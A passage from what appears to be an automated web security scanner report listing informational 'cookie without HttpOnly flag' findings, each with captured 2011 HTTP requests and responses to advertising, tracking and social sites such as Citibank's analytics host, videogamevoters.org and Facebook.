The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixspike.php?tsatime=1308921988127&nouref=1&siteid=691&wayid=3695&tsa1v691=uvid2e41e2ae9bb0e54440f0349f7c2d553588127&tsa1s691=usid2e41e2ae9bb0e54440f0349f7c2d553588127 HTTP/1.1
Host: thesearchagency.net
Proxy-Connection: keep-alive
Referer: http://everquest2.com/free_to_play
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:30:15 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny8
Set-Cookie: tsas691=usid2e41e2ae9bb0e54440f0349f7c2d553588127; path=/; domain=.thesearchagency.net
Set-Cookie: tsav691=uvid2e41e2ae9bb0e54440f0349f7c2d553588127; expires=Thu, 20-Mar-2014 13:30:15 GMT; path=/; domain=.thesearchagency.net
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR UNRa IND UNI COM NAV INT STA PRE"
Expires: Thu, 19 Aug 1993 21:00:00 GMT
Cache-Control: no-store
Pragma: no-cache
Accept-Ranges: bytes
Content-Length: 67
Connection: close
Content-Type: image/gif

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;
13.69. http://vendorweb.citibank.com/HG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vendorweb.citibank.com
Path:   /HG

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HG?hc=&hb=DM561106CHEF&cd=1&hv=6&n=/ExxonMobil+Personal+Credit+Card%2C+Consumer+Credit+Card%2C+Gasoline+Credit+Card&con=&vcon=/us/cards/exmbl&tt=auto&ja=y&dt=8&zo=300&lm=1308940111000&bn=Netscape&ce=y&ss=1920*1200&sc=32&sv=12&cy=u&hp=u&ln=en-US&vpc=HBX0100u&vjs=HBX0141.01u&hec=0&pec=&cmp=&gp=&dcmp=&dcmpe=&dcmpre=&cp=null&fnl=&seg=&epg=&cv=&gn=&ld=&la=&c1=&c2=&c3=&c4=&customerid=&lv.id=&lv.pos=&ttt=lid,lpos&ra=&rf=bookmark&pl=Shockwave%20Flash%3AJava%20Deployment%20Toolkit%206.0.260.3%3AJava%28TM%29%20Platform%20SE%206%20U26%3AChrome%20PDF%20Viewer%3AGoogle%20Gears%200.5.33.0%3AWPI%20Detector%201.3%3AGoogle%20Update%3ADefault%20Plug-in%3A&hid=0.9942544410005212 HTTP/1.1
Host: vendorweb.citibank.com
Proxy-Connection: keep-alive
Referer: http://www.citibank.com/us/cards/exmbl/exmb_personal.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FD979085078411-600001004008D908[CE]; WSS_GW=V1z%Xri^BBree; CTG=1308922106; DM561106CHEFV6=V1rrrrr"rz%Xri^BBree%^ri@@z%zrzCr"%Xri^BBreez%Xri^BBree"%Xri^BB%re"%Xri^BBree%^ri@@"Crz(xB$DFxB$cIh_FxB$aKmu~xB$(KK:Tl:u2~xBr5ha_2fxBr5Ih_FxB5xBrju:DfxBrjcc:DTfxBr<T~2Taz7}z)OuKr6iCzA6DF6cIh_F6aKmu~6(KK:Tl:u2~H5ha_2fH5Ih_F`Hju:DfHjcc:DTfH<T~2Ta

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:28:30 GMT
Server: Hitbox Gateway 9.3.6-rc1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Set-Cookie: WSS_GW=V1z%Xri^BBree; path=/; domain=vendorweb.citibank.com; expires=Sat, 23-Jun-2012 13:28:30 GMT; max-age=31536000
Set-Cookie: CTG=1308922110; path=/; domain=vendorweb.citibank.com; expires=Fri, 01-Jul-2011 13:28:30 GMT; max-age=604800
Set-Cookie: DM561106CHEFV6=V1rrrrr"rz%Xri^BBree%^ri@@z%zrzCC"%Xri^BBreez%Xri^BBree"%Xri^BB%%r"%Xri^BBree%^ri@@"Cz(xB$DFxB$cIh_FxB$aKmu~xB$(KK:Tl:u2~xBr5ha_2fxBr5Ih_FxB5xBrju:DfxBrjcc:DTfxBr<T~2Taz7}z)OuKr6iCzA6DF6cIh_F6aKmu~6(KK:Tl:u2~H5ha_2fH5Ih_F`Hju:DfHjcc:DTfH<T~2TaA6DF6cIh_F6aKmu~6(KK:Tl:u2~HYahF:TI~H5ha_2fH5Ih_`H5:TFDmahH5ha_2fH5Ih_`HVIF:~2TaH5ha_2fH5Ih_; path=/; domain=vendorweb.citibank.com; expires=Sat, 23-Jun-2012 13:28:30 GMT; max-age=31536000
Cneonction: close
Pragma: no-cache
Vary: *
Cache-Control: no-cache, private, must-revalidate
Expires: Fri, 24 Jun 2011 13:28:31 GMT
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;
13.70. http://videogamevoters.org/index.php/modal/sc-soon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://videogamevoters.org
Path:   /index.php/modal/sc-soon

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.php/modal/sc-soon HTTP/1.1
Host: videogamevoters.org
Proxy-Connection: keep-alive
Referer: http://videogamevoters.org/eacorp/?topicId=11341
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-jljaemke=B82E653654DADA390F78AB527FA85CD6; exp_last_visit=993577424; exp_last_activity=1308937424; exp_tracker=a%3A0%3A%7B%7D; __utmz=27825467.1308923027.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27825467.253868994.1308923027.1308923027.1308923027.1; __utmc=27825467; __utmb=27825467.1.10.1308923027; mw-sc-soon=visited; X-CheckNode=

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Fri, 24 Jun 2011 13:43:47 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: exp_last_activity=1308937427; expires=Sat, 23-Jun-2012 13:43:48 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fmodal%2Fsc-soon%2F%22%3B%7D; path=/
Set-Cookie: X-CheckNode=; domain=videogamevoters.org; path=/
Last-Modified: Fri, 24 Jun 2011 13:43:48 GMT
Content-Length: 4531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
13.71. http://videogamevoters.org/js/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://videogamevoters.org
Path:   /js/index

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /js/index HTTP/1.1
Host: videogamevoters.org
Proxy-Connection: keep-alive
Referer: http://videogamevoters.org/eacorp/?topicId=11341
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-CheckNode=; X-Mapping-jljaemke=B82E653654DADA390F78AB527FA85CD6

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/javascript
Date: Fri, 24 Jun 2011 13:43:44 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: exp_last_visit=993577424; expires=Sat, 23-Jun-2012 13:43:44 GMT; path=/
Set-Cookie: exp_last_activity=1308937424; expires=Sat, 23-Jun-2012 13:43:44 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fjs%2Findex%2F%22%3B%7D; path=/
Set-Cookie: exp_tracker=a%3A0%3A%7B%7D; path=/
Set-Cookie: X-CheckNode=; domain=videogamevoters.org; path=/
Last-Modified: Fri, 24 Jun 2011 13:43:45 GMT
Content-Length: 2346

jQuery.noConflict();

function form_input_classes(){

jQuery('input[type="text"]').addClass('text');
jQuery('input[type="password"]').addClass('text');
jQuery('input[type="checkbox"]').add
...[SNIP]...
13.72. http://videogamevoters.org/page/spud  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://videogamevoters.org
Path:   /page/spud

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /page/spud?hash=8025 HTTP/1.1
Host: videogamevoters.org
Proxy-Connection: keep-alive
Referer: http://videogamevoters.org/page/s/raiseyourvoice
Content-Length: 102
Origin: http://videogamevoters.org
X-Requested-With: BSD AJAX, revision 12/8/2005
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-jljaemke=B82E653654DADA390F78AB527FA85CD6; exp_last_visit=993577424; __utmz=27825467.1308923027.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27825467.253868994.1308923027.1308923027.1308923027.1; __utmc=27825467; __utmb=27825467.1.10.1308923027; mw-sc-soon=visited; PHPSESSID=9d712ec099019f18fde151f161211342; exp_last_activity=1308937444; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fmodal%2Fsc-soon%2F%22%3B%7D; X-CheckNode=

type=getm&field=email%2Cfirstname%2Clastname%2Caddr1%2Caddr2%2Ccity%2Cstate_cd%2Czip%2Ccountry%2Cphone

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Date: Fri, 24 Jun 2011 13:44:14 GMT
Set-Cookie: spud=9YPeARXTg2SgZ1KgU3RMd6f3; expires=Sun, 23-Jun-2013 13:44:14 GMT; path=/; domain=videogamevoters.org
Set-Cookie: X-CheckNode=; domain=videogamevoters.org; path=/
Content-Length: 145

200
{"email":null,"firstname":null,"lastname":null,"addr1":null,"addr2":null,"city":null,"state_cd":null,"zip":null,"country":null,"phone":null}
13.73. http://www.addthis.com/bookmark.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bookmark.php?v=250&winname=addthis&pub=asepyanm&source=tbx-250,max-250&lng=en&s=hotmail&url=http%3A%2F%2Fbeta.telkom.co.id%2Fpojok-media%2Fsiaran-pers%2Ftelkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html&title=TELKOM%20-%20Telkom%20Meraih%20IMAC%20Award%20sebagai%20The%20Best%20Provider%20and%20Telecommuncation&ate=AT-asepyanm/-/-/4e048e7fb62f9138/4/4dce8a530508b02d&frommenu=1&uid=4dce8a530508b02d&ct=1&pre=http%3A%2F%2Fbeta.telkom.co.id%2Fpojok-media%2Fsiaran-pers%2F&tt=0 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; uid=4dce8a530508b02d; psc=3; di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1308921511.3N|1308911539.1EY|1308911539.60|1308911539.1FE|1308911539.1WV|1308225884.1VV|1308225884.19F|1306359996.1OD; bt=1308921511|00004N010; dt=X; ssh=eJwzMjA0NDAzMrFKS0xOTcrPz9YxBAAv8wVi; sshs=facebook; Coyote-2-a0f0083=a0f02a8:0

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:18:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
P3P: CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: ssh=eJwzMjA0NDAzMrFKS0xOTcrPz9YxtM7IL8lNzMzRMQIAekYI6Q%3D%3D; expires=Sun, 23-Jun-2013 13:18:52 GMT; path=/; domain=.addthis.com
Set-Cookie: sshs=hotmail%2Cfacebook; expires=Sun, 23-Jun-2013 13:18:52 GMT; path=/; domain=.addthis.com
Vary: Accept-Encoding
Content-Length: 774
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
<title>contacting Hotmail ...</title>
<meta http-equiv="refresh" content="0;url=http://www.hotmail.msn.com/secure/start?action=compose&to=&subject=TELKOM+-+Telkom+Meraih+
...[SNIP]...
13.74. http://www.facebook.com/login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /login.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.addthis.com/bookmark.php?v=250&winname=addthis&pub=asepyanm&source=tbx-250,men-250&lng=en&s=facebook&url=http%3A%2F%2Fbeta.telkom.co.id%2Fproduk-layanan%2F&title=Produk%20dan%20Layanan&ate=AT-asepyanm/-/-/4e048e8a01452adb/4/4dce8a530508b02d&frommenu=1&uid=4dce8a530508b02d&ct=1&pre=http%3A%2F%2Fbeta.telkom.co.id%2Finfo-perusahaan%2F&tt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=Jr-eQ; next=http%3A%2F%2Fwww.facebook.com%2Fsharer%2Fsharer.php%3Fu%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%2523.TgSOp6MNlm8.facebook; next_path=%2Fsharer%2Fsharer.php%3Fu%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%2523.TgSOp6MNlm8.facebook

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; expires=Sun, 23-Jun-2013 13:18:36 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.140.126
X-Cnection: close
Date: Fri, 24 Jun 2011 13:18:36 GMT
Content-Length: 17051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
13.75. http://www.gamersdailynews.com/advertising/administration/www/delivery/ajs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamersdailynews.com
Path:   /advertising/administration/www/delivery/ajs.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /advertising/administration/www/delivery/ajs.php?zoneid=13&cb=58201770879&charset=windows-1254&loc=http%3A//www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html HTTP/1.1
Host: www.gamersdailynews.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: phpbb3_drqak_u=1; phpbb3_drqak_k=; phpbb3_drqak_sid=8bc5b9544f80f0ba5ecbaf89ec71c4c6; __switchTo5x=21; __unam=383617f-130c1d4b0b1-2c952677-1; __utmz=113500945.1308922001.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113500945.1055506945.1308922001.1308922001.1308922001.1; __utmc=113500945; __utmb=113500945.1.10.1308922001; MAXID=fa0cb0dd8401d4dd8675f9f0abbbd18f

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:26:48 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Vary: Accept-Encoding
Set-Cookie: MAXID=fa0cb0dd8401d4dd8675f9f0abbbd18f; expires=Sat, 23-Jun-2012 13:26:48 GMT; path=/
Content-Type: text/javascript; charset=windows-1254
Content-Length: 1020

var OX_202a72c1 = '';
OX_202a72c1 += "<"+"a href=\"http://www.gamersdailynews.com/advertising/administration/www/delivery/ck.php?maxparams=2__bannerid=105__zoneid=13__cb=06fa2ca4d0__maxdest=http%3A%2F
...[SNIP]...
13.76. http://www.gamersdailynews.com/advertising/administration/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamersdailynews.com
Path:   /advertising/administration/www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /advertising/administration/www/delivery/lg.php?bannerid=105&campaignid=56&zoneid=13&loc=1&referer=http%3A%2F%2Fwww.gamersdailynews.com%2Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html&cb=06fa2ca4d0 HTTP/1.1
Host: www.gamersdailynews.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: phpbb3_drqak_u=1; phpbb3_drqak_k=; phpbb3_drqak_sid=8bc5b9544f80f0ba5ecbaf89ec71c4c6; __switchTo5x=21; __unam=383617f-130c1d4b0b1-2c952677-1; __utmz=113500945.1308922001.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113500945.1055506945.1308922001.1308922001.1308922001.1; __utmc=113500945; __utmb=113500945.1.10.1308922001; MAXID=fa0cb0dd8401d4dd8675f9f0abbbd18f

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:27:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: MAXID=fa0cb0dd8401d4dd8675f9f0abbbd18f; expires=Sat, 23-Jun-2012 13:27:01 GMT; path=/
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;
13.77. http://www.googleadservices.com/pagead/aclk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/aclk?sa=L&ai=BfELNjo8ETsG2FKP7lQesrNm2AceTxJcC76KQhyXAjbcBkN-hARABGAEgwcvRHjgAUJeRzKP______wFgydbyhsij_BqgAbeJ--kDsgEVd3d3LnBodWtldC10cmF2ZWwuY29tugEKMTIweDYwMF9hc8gBCdoBHWh0dHA6Ly93d3cucGh1a2V0LXRyYXZlbC5jb20vuAIYyAKvtZQaqAMB0QPgy9uX8AkKYegD7AfoA7Mt6AOzAegDzSfoA0P1AwAAAMQ&num=1&client=ca-pub-4422256122899399&val=ChAwY2E0MmQ4MTM3MDAwMGIzEM-pue4EGgjtg8uujvUQZyABKAE&sig=AGiWqtztk8LXvH-0DC-TiBn8CX7Ajzkjeg&adurl=http://ad.doubleclick.net/click%3Bh%3Dv8/3b30/2/0/*/a%3B241822308%3B0-0%3B0%3B64413316%3B933-120/600%3B42361883/42379670/1%3B%3B~sscs%3D%3Fhttp://www.celebritycruises.com/specials/viewHTMLPromo.do%3Fpagename%3DEuropePromotions%26cS%3Dvanity%26vanity%3DEuropePromotion%26cid%3Ddi_pgr_0601_dr11q2eu_1106_sky HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4422256122899399&output=html&h=600&slotname=7706808172&w=120&lmt=1308899798&flash=10.3.181&url=http%3A%2F%2Fwww.phuket-travel.com%2F&dt=1308921743060&bpp=3&shv=r20110615&jsv=r20110616&correlator=1308921743084&frm=4&adk=3252930215&ga_vid=643271157.1308921743&ga_sid=1308921743&ga_hid=1634133515&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=822&ref=http%3A%2F%2Fwww.phuket.com%2Fislands%2Findex.htm&fu=0&ifi=1&dtd=43&xpc=ynyfOlPgfP&p=http%3A//www.phuket-travel.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Set-Cookie: Conversion=CoQCQmZFTE5qbzhFVHNHMkZLUDdsUWVzck5tMkFjZVR4SmNDNzZLUWh5WEFqYmNCa04taEFSQUJHQUVnd2N2UkhqZ0FVSmVSektQX19fX19fd0ZneWRieWhzaWpfQnFnQWJlSi0ta0RzZ0VWZDNkM0xuQm9kV3RsZEMxMGNtRjJaV3d1WTI5dHVnRUtNVEl3ZURZd01GOWhjOGdCQ2RvQkhXaDBkSEE2THk5M2QzY3VjR2gxYTJWMExYUnlZWFpsYkM1amIyMHZ1QUlZeUFLdnRaUWFxQU1CMFFQZ3k5dVg4QWtLWWVnRDdBZm9BN010NkFPekFlZ0R6U2ZvQTBQMUF3QUFBTVESEwie-pLD0c6pAhWVduUKHaNNNS8YASCXkdi84KeA_RBIAQ; expires=Sun, 24-Jul-2011 13:22:37 GMT; path=/pagead/conversion/1027523767/
Cache-Control: private
Location: http://ad.doubleclick.net/click;h=v8/3b30/2/0/*/a;241822308;0-0;0;64413316;933-120/600;42361883/42379670/1;;~sscs=?http://www.celebritycruises.com/specials/viewHTMLPromo.do?pagename=EuropePromotions&cS=vanity&vanity=EuropePromotion&cid=di_pgr_0601_dr11q2eu_1106_sky
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 24 Jun 2011 13:22:37 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block

13.78. http://www.mapquest.com/_svc/ad/getads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /_svc/ad/getads

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /_svc/ad/getads HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/
Content-Length: 707
Origin: http://www.mapquest.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="PuS5h/EipDX1lQ3yENE105ZQuwQ="; tsexpiry=1; psession="htZQI27rp9upP5M1sdqhuRpH5n4="; c_Id=MjQyOjQwNA%3D%3D

{"request":{"pageView":"initial","userLocale":"en_US","userState":{"locations":[{"role":"mapcenter","lattitude":32.78699999999999,"longitude":-96.7993433227539}],"legs":[],"searches":[],"routeDistance
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: c_Id=MjQyOjQwNA%3D%3D; Expires=Fri, 24-Jun-2011 14:45:24 GMT; Path=/
Expires: Mon, 20 Dec 1998 01:00:00 GMT
Last-Modified: Fri, 24 Jun 2011 14:15:24 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: application/json
Content-Length: 464
Date: Fri, 24 Jun 2011 14:15:24 GMT

{"data":{"parameters":{"dotcom-right-header":{"adParametersTypeString":"HTML","encodedStateHash":null,"htmlText":"","type":"HTML"},"bottom-content":{"adParametersTypeString":"UAC","adTitle":null,"adTy
...[SNIP]...
13.79. http://www.mapquest.com/_svc/apixel  previous  next

Summary

